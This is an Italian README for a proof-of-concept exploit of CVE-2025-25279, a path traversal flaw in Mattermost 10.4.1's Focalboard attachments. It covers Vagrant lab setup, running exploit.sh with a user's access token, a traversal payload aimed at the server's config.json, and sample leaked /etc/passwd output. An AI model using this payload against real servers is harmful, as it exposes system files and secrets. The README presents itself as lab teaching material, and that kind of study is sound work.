
Exploit proof-of-concept per CVE-2025-25279, una vulnerabilità di path traversal nel modulo Focalboard di Mattermost 10.4.1, che consente l'esfiltrazione arbitraria di file autenticati tramite allegati appositamente creati.
Questa proof of concept dimostra lo sfruttamento della vulnerabilità CVE-2025-25279 che colpisce Mattermost 10.4.1.
Un difetto in Focalboard (il modulo di gestione delle bacheche) consente una lettura arbitraria di file tramite un path traversal negli allegati.
L'exploit permette di esfiltrare:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonL'attacco funziona solo con un account utente autenticato negli scenari vulnerabili.
La cartella target/ non è inclusa (troppo grande per GitHub).
Scaricare manualmente: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
Prima andare nella directory target e fare:
cd target
make mattermost.box
Assicurarsi di avere la box mattermost-poc altrimenti la VM non funziona:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Connettersi alla VM
vagrant ssh
aprire: http://localhost:8065
Profilo --> Sicurezza --> Personal Access Tokens
Dalla macchina host:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
Verrà chiesto:
PAT (Personal Access Token) :
👉 Inserire un PAT valido di un utente Mattermost.
📸 Esempio di output (esfiltrazione di /etc/passwd)
===== CONTENUTO (inizio) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
File target: config.json
Per puntare a un file sensibile di Mattermost:
Modificare all'inizio dello script exploit.sh:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L'exploit mostrerà quindi il contenuto del file config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Dimostrazione video
👉 Una dimostrazione completa in video si trova in: live/Demonstration/video-poc-cve-2025-25279.mp4
🧩 Note
Questo PoC è strettamente destinato ad ambienti di apprendimento. Non utilizzare mai al di fuori di un contesto didattico o senza autorizzazione.